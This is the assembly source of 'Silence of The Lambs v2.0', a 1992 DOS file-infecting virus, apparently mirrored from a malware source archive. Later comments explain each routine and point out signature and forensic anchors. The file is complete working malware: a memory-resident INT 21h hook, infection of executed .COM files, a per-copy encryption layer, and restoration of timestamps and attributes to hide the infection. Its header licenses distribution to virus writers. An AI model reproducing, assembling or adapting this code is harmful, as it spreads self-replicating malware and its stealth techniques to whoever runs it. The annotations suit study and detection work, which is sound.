mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
; Silence of The Lambs v2.0
|
||
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
|
||
;
|
||
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
|
||
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
|
||
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
|
||
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
|
||
; THE ORIGINAL SOURCE.
|
||
;
|
||
; Assemble With A86
|
||
;
|
||
|
||
; Entry stub and decryptor of the .COM image (assembled for load offset 100h).
; The short jump skips the two marker bytes 'DY', which therefore sit at file
; offset 2; the infect routine later reads them back to recognise an already
; modified file. The marker and this plaintext stub are the stable, unencrypted
; part of the image and are the natural anchor for a static signature.
org 100h
|
||
jmp short dummy1
|
||
db 'DY'
|
||
dummy1:
|
||
; cx = number of bytes from enc_start to the end of the image, si = their start.
mov cx,length
|
||
mov si,offset enc_start
|
||
; The immediate byte of this instruction is the per-copy key: enc_key names
; its address, and infect overwrites it before each copy is written.
mov ah,0
|
||
enc_key equ $-1
|
||
dummy2:
|
||
; Decode one byte in place (subtract the running key), then advance the key
; by the step held in the immediate of the ADD below (enc_add names that
; byte). Key and step differ per copy, so only the stub bytes around them
; stay constant across samples.
sub byte [si],ah
|
||
inc si
|
||
add ah,0
|
||
enc_add equ $-1
|
||
loop dummy2
|
||
; Residency probe and memory-resident installation.
; Behavioural indicators visible here: an INT 21h AH=2Dh call with CH=DH=0FFh,
; a write to the memory control block in front of the program, a lowered
; top-of-memory word in the PSP, and a rewritten INT 21h vector at 0000:0084h.
enc_start:
|
||
; INT 21h AH=2Dh is "set system time". CX is 0 after the decrypt loop, so
; CH=0FFh makes CX=0FF00h and DX=CX gives DH=0FFh: an invalid time, for which
; DOS returns AL=0FFh. The resident handler (ni21) answers this exact request
; with AL=0, so AL != 0FFh means a copy is already resident.
mov ah,2Dh
|
||
mov ch,0FFh
|
||
mov dx,cx
|
||
int 21h
|
||
cmp al,0FFh
|
||
jne nomore
|
||
|
||
; DS = CS-1 addresses the memory control block (MCB) that precedes the
; program's block. Byte 0 = 'Z' marks the last block in the chain; anything
; else skips installation.
mov ax,cs
|
||
dec ax
|
||
mov ds,ax
|
||
cmp byte [0],'Z'
|
||
jne nomore
|
||
|
||
; MCB word at offset 3 is the block size in paragraphs. The size is reduced by
; pgfsize only if the subtraction does not borrow. DS:12h is CS:0002h, the
; PSP's top-of-memory segment, which is lowered by the same amount.
mov ax,word [3]
|
||
sub ax,pgfsize
|
||
jc nomore
|
||
sub word [3],pgfsize
|
||
sub word [12h],pgfsize
|
||
|
||
; ES = the new top-of-memory segment. DS:110h is the same address as CS:100h,
; so this copies `total` bytes of the running image to ES:100h.
mov es,word [12h]
|
||
mov si,110h
|
||
mov di,100h
|
||
mov cx,total
|
||
cld
|
||
rep movsb
|
||
|
||
; 0000:0084h is the INT 21h vector (21h * 4). Its four bytes are copied into
; the far-jump operand at old21 inside the resident copy, so the handler can
; chain to the previous owner.
xor ax,ax
|
||
mov ds,ax
|
||
mov si,84h
|
||
mov di,old21
|
||
movsw
|
||
movsw
|
||
|
||
; Point INT 21h at ES:ni21 with interrupts disabled during the two writes.
cli
|
||
mov word [84h+2],es
|
||
mov word [84h],offset ni21
|
||
sti
|
||
|
||
; Common exit of the start-up code: reached when a copy is already resident,
; when installation was skipped, or after installation.
nomore:
|
||
; Restore DS = ES = CS, as a .COM program expects on entry.
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
|
||
; The 16-bit immediate of this MOV (named eof) is rewritten by infect for each
; file to the in-memory address of the appended restore stub (`append`), so
; the JMP continues there and the host program runs afterwards.
mov bx,0000h ;return control to the
|
||
eof equ $-2 ;end user
|
||
jmp bx
|
||
|
||
; Relay to `close` for the conditional jumps in infect; presumably needed
; because their targets are out of short-jump range - confirm.
xclose: jmp close
|
||
|
||
; File-modification routine, called from the resident INT 21h handler after it
; has copied the program path to CS:0000.
; Scratch words in the resident segment: 0F0h = saved attributes,
; 0F2h/0F4h = saved time/date, 0F6h = address that will be patched into eof.
; Resulting file layout, as written below: [image, `total` bytes]
; [rest of the original file][original first `total` bytes, XOR-encoded]
; [restore stub, `applen` bytes]. The file therefore grows by total+applen
; bytes while its attributes and timestamp are put back, so a size change
; with an unchanged timestamp is the forensic trace to look for.
infect:
|
||
push cs
|
||
pop ds
|
||
push cs
|
||
pop es
|
||
|
||
; 0E4h,40h encodes `in al,40h`: one byte is read from I/O port 40h and stored
; as this copy's key in the decryptor's immediate.
db 0E4h,40h
|
||
mov byte [enc_key],al
|
||
|
||
; DS:DX = CS:0000, where the handler placed the path.
mov ax,4300h ;use CHMOD to get file attr
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
mov [0F0h],cx ;store attr in PSP
|
||
|
||
mov ax,4301h ;clear file attr with CHMOD
|
||
xor cx,cx
|
||
int 21h
|
||
|
||
mov ax,3D02h ;open file for read / write
|
||
int 21h
|
||
; BX = handle. The flags from the open call are parked on the stack (LAHF/PUSH)
; across the next DOS call and tested afterwards (POP/SAHF/JC).
xchg bx,ax
|
||
lahf
|
||
push ax
|
||
mov ax,5700h ;get file date & time
|
||
int 21h
|
||
|
||
mov [0F2h],cx
|
||
mov [0F4h],dx
|
||
pop ax
|
||
sahf
|
||
jc xclose
|
||
|
||
; Read the first `total` bytes of the file into the buffer at `old`.
mov ah,3Fh ;read from file
|
||
mov cx,total
|
||
mov dx,old
|
||
int 21h
|
||
|
||
; Files whose first byte is 'M' or 'Z' (EXE headers) are left alone.
cmp byte [old+0],'M' ;exe MZ ?
|
||
je xclose
|
||
cmp byte [old+0],'Z' ;exe ZM ?
|
||
je xclose
|
||
; Marker test on the word at file offset 2, the position of `db 'DY'` in the
; entry stub. NOTE(review): this relies on A86 encoding 'YD' as the bytes
; 'D','Y' - confirm against the assembler.
cmp word [old+2],'YD' ;already infected?
|
||
je xclose
|
||
|
||
mov ax,4202h ;lseek to EOF
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
; Size window, judged on AH of the returned low word only: the file is
; skipped when AH >= 0FAh or AH < 4.
cmp ah,0FAh
|
||
jae xclose
|
||
cmp ah,4
|
||
jb xclose
|
||
|
||
; original length + total + 100h = load address of the restore stub once it
; has been appended; kept in 0F6h for the eof patch below.
add ax,total+100h
|
||
mov word [00F6h],ax
|
||
|
||
mov ah,40h ;write to EOF
|
||
mov cx,total
|
||
mov dx,old
|
||
|
||
; XOR the saved original bytes in the buffer with the key before they are
; written; CX is preserved around the loop for the write call.
push cx
|
||
mov al,byte [enc_key]
|
||
mov si,dx
|
||
enc_app:
|
||
xor byte [si],al
|
||
inc si
|
||
loop enc_app
|
||
pop cx
|
||
|
||
int 21h
|
||
|
||
; Append the restore stub (`append`, applen bytes) in plaintext.
mov ah,40h ;write to EOF
|
||
mov cx,applen
|
||
mov dx,offset append
|
||
int 21h
|
||
|
||
mov ax,4200h ;lseek to beginning of file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
; Temporarily replace the eof immediate with this file's stub address; the
; resident copy's own value is restored by the POP after the write.
push [eof]
|
||
mov ax,word [00F6h]
|
||
mov [eof],ax
|
||
|
||
; AH = key, and a second port-40h read supplies the key step (stored in the
; enc_add immediate and kept in DL).
mov ah,byte [enc_key]
|
||
db 0E4h,40h
|
||
mov byte [enc_add],al
|
||
mov dl,al
|
||
|
||
mov si,100h
|
||
mov di,old
|
||
|
||
; The stub from 100h up to enc_start is copied unchanged (it carries the
; freshly patched key and step).
cld
|
||
mov cx,offset enc_start-100h
|
||
rep movsb
|
||
|
||
; The remaining `length` bytes are encoded with the inverse of the entry
; decryptor: add the running key, then advance it by the step.
mov cx,length
|
||
enc:
|
||
lodsb
|
||
add al,ah
|
||
stosb
|
||
add ah,dl
|
||
loop enc
|
||
|
||
mov ah,40h ;write viral code
|
||
mov dx,old
|
||
mov cx,total
|
||
int 21h
|
||
|
||
pop [eof]
|
||
|
||
; Shared clean-up path (also reached through xclose): restore the saved
; time/date (AX=5701h), close the handle, then restore the saved attributes
; on the path at CS:0000.
close:
|
||
mov ax,5701h
|
||
mov cx,[00F2h]
|
||
mov dx,[00F4h]
|
||
int 21h
|
||
|
||
mov ah,3Eh ;close file
|
||
int 21h
|
||
|
||
mov ax,4301h
|
||
mov cx,[00F0h]
|
||
xor dx,dx
|
||
int 21h
|
||
ret
|
||
|
||
; Restore stub. infect appends these applen bytes, in plaintext, to the end of
; every modified file, and the patched `jmp bx` at nomore transfers here.
; It puts the host's original first `total` bytes back at 100h and starts the
; host. Because it is stored unencoded at the end of the file, it is a second
; stable byte sequence for static matching.
append:
|
||
; call/pop yields the stub's own run-time address; subtracting 3+total steps
; back to the encoded original bytes stored directly in front of it.
call $+3 ;replace org bytes
|
||
pop si
|
||
sub si,3+total
|
||
mov di,100h
|
||
mov cx,total
|
||
; The key is read from the decryptor immediate before the loop overwrites
; that area.
mov ah,byte [enc_key]
|
||
append_enc:
|
||
lodsb
|
||
xor al,ah
|
||
stosb
|
||
loop append_enc
|
||
|
||
; Push 100h so the final RET lands on the restored host entry point.
mov ax,100h ;return IP to 100h when done
|
||
push ax
|
||
|
||
; Mixed sub/xor/and forms. `and r,r` leaves the register value unchanged;
; CX is already 0 here because the loop above ran to completion.
sub ax,ax ;zero regs
|
||
xor bx,bx
|
||
and cx,cx
|
||
sub dx,dx
|
||
xor si,si
|
||
and di,di
|
||
sub bp,bp
|
||
|
||
ret
|
||
; Stub size in bytes, used as the write length in infect.
applen equ $-offset append
|
||
|
||
; Resident INT 21h handler installed by the start-up code.
; Two behaviours: it answers the residency probe, and it intercepts
; AX=4B00h (load and execute program) to call infect on the program being
; started. Every other request is passed to the previous handler unchanged.
ni21:
|
||
pushf
|
||
; Residency probe: AH=2Dh with CH=0FFh and CH=DH returns AL=0 directly,
; where unhooked DOS would report AL=0FFh for the invalid time.
cmp ah,2Dh
|
||
jne Not_Time
|
||
cmp ch,0FFh
|
||
jne Not_Time
|
||
cmp ch,dh
|
||
jne Not_time
|
||
|
||
mov Al,0
|
||
popf
|
||
iret
|
||
Not_Time:
|
||
; Save the caller's registers; they are popped in reverse order at Not_Exec.
cld
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push es
|
||
push ds
|
||
|
||
; The following block is commented out in the source and is not assembled.
; cmp ah,41h
|
||
; jne Not_Parse
|
||
; mov ah,3Ch
|
||
; cli
|
||
; add sp,18
|
||
; sti
|
||
; popf
|
||
; jmp old21-1
|
||
|
||
Not_Parse:
|
||
cmp ax,4B00h
|
||
jne Not_Exec
|
||
|
||
; Copy 128 bytes from the caller's DS:DX (the program path for AX=4B00h) to
; offset 0 of the resident segment, where infect expects it.
mov si,dx
|
||
push cs
|
||
pop es
|
||
xor di,di
|
||
mov cx,128
|
||
rep movsb
|
||
|
||
; Fetch the current INT 24h (critical error) vector and keep it on the stack.
mov ax,3524h
|
||
int 21h
|
||
push es
|
||
push bx
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
; Point INT 24h at ni24 for the duration of the call, so DOS critical-error
; prompts are presumably suppressed while infect runs.
mov ax,2524h
|
||
mov dx,offset ni24
|
||
int 21h
|
||
|
||
call infect
|
||
|
||
; Put the saved INT 24h vector back (DS:DX popped from the stack).
pop dx
|
||
pop ds
|
||
mov ax,2524h
|
||
int 21h
|
||
|
||
Not_Exec:
|
||
pop ds
|
||
pop es
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
; Chain to the previous INT 21h owner. The 4-byte operand (named old21) holds
; 0000:0000 in the source and is filled with the original vector at install.
jmp far 0000:0000
|
||
old21 equ $-4
|
||
|
||
; Temporary INT 24h (critical error) handler used while infect runs: it
; returns AL=0, the "ignore" response.
ni24: mov al,0
|
||
iret
|
||
|
||
; Text stored in the image; the code shown never prints it. It lies after
; enc_start, so in a file on disk it is inside the encoded region and is
; readable only in the resident memory copy.
db 'The Silence Of The Lambs!$'
|
||
|
||
; total   = image size in bytes, from 100h to this point.
; pgfsize = paragraphs taken from the host's memory block at install,
;           computed from twice the current offset, plus 2.
; length  = size of the encoded region, from enc_start to this point.
total equ $-100h ;size
|
||
pgfsize equ (($*2)/16)+2
|
||
length equ $-offset enc_start
|
||
|
||
; old = first byte after the image; used as the work buffer by infect.
old equ $
|
||
|
||
|
||
|